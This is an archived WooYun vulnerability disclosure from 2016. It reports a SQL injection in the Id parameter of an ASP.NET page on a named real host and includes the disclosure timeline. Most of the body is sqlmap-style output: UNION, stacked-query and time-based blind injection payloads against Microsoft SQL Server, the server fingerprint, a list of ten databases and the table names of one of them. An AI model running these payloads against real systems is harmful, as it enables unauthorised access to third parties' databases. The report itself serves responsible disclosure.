乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-15: 厂商已经确认,细节仅向厂商公开 2016-01-25: 细节向核心白帽子及相关领域专家公开 2016-02-04: 细节向普通白帽子公开 2016-02-14: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
http://jf.crcxf.com:8001/Service/EmployDetaile.aspx?Id=
Place: GETParameter: Id Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: Id=' UNION ALL SELECT 12,12,12,CHAR(58) CHAR(109) CHAR(102) CHAR(120) CHAR(58) CHAR(114) CHAR(74) CHAR(104) CHAR(113) CHAR(116) CHAR(75) CHAR(120) CHAR(76) CHAR(82) CHAR(65) CHAR(58) CHAR(117) CHAR(113) CHAR(100) CHAR(58),12,12-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: Id='; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: Id=' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [10]:[*] crcgas[*] GPSDB[*] hrejck[*] hrrqrj20150201[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: hrejck[35 tables]+------------------------+| DevTableSeting || GoodsBoundary || GoodsEmploy || GoodsEmployDetail || GoodsEmployDetail_Temp || GoodsEmploy_Temp || GoodsOut || GoodsOutDetail || GoodsOutInStorage || GoodsOutInStorage_Temp || GoodsStock || GoodsStock_Use || Goods_DisType || RefundGoods || RefundGoodsDetaile || SysDepartment || SysGoods || SysMenuSysRole || SysPerson || SysRole || SysRoleSysPerson || SysStorage || Temp_Receive0 || Temp_Receive1 || code || codelb || fldtable || fldtable0 || menutree || sysdiagrams || test || v_GoodsOut || v_GoodsUse || v_Goodsstock || v_syscolumns |+------------------------+
危害等级:高
漏洞Rank:15
确认时间:2016-01-15 15:01
感谢提交
暂无